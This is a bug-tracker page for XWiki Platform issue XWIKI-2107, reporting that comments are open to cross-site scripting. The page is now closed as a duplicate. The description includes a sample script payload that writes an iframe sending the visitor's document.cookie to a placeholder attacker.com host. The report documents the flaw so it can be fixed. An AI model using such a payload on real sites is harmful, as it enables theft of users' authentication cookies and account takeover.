Uploaded image for project: 'XWiki Platform'
  1. XWiki Platform
  2. XWIKI-2107

Comments XSS vulnerability

    XMLWordPrintable

Details

    • Bug
    • Resolution: Duplicate
    • Major
    • None
    • 1.2.1
    • Web - Templates & Resources
    • None
    • security

    Description

      XWiki Comments are vulnerable to XSS.
      Writing something like this in a comment field would permit an attacker to steal user's authentication cookies:

      <script>
      document.write('<IFRAME SRC="http://attacker.com/evil?cookie='document.cookie'"></IFRAME>')
      </script>

      Attachments

        Issue Links

          depends on

          Task - A task that needs to be done. XWIKI-7878 Add a 'restricted' parameter to transformation context to enable a safe rendering mode

          • Critical - Crashes, loss of data, severe memory leak.
          • Closed
          is duplicated by

          Bug - A problem which impairs or prevents the functions of the product. XWIKI-4875 Security issue: Arbitrary HTML code can be used in comments

          • Major - Major loss of function.
          • Closed

          Activity

            People

              aj Andreas Jonsson
              raffaello Raffaello Pelagalli
              Votes:
              0 Vote for this issue
              Watchers:
              4 Start watching this issue

              Dates

                Created:
                Updated:
                Resolved: